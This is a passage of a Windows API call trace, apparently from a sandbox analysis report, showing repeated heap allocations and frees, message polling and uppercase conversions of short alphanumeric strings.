(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0244.274] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0244.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.274] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0244.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0244.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0244.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0244.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0244.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0244.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0244.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0244.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.277] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0244.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0244.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0244.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0244.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0244.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.280] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0244.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0244.280] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0244.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.281] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0244.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0244.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0244.282] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0244.282] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0244.282] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0244.282] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0244.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.283] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0244.283] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0244.283] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0244.285] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0244.285] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.285] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.285] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.286] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.286] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0244.286] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 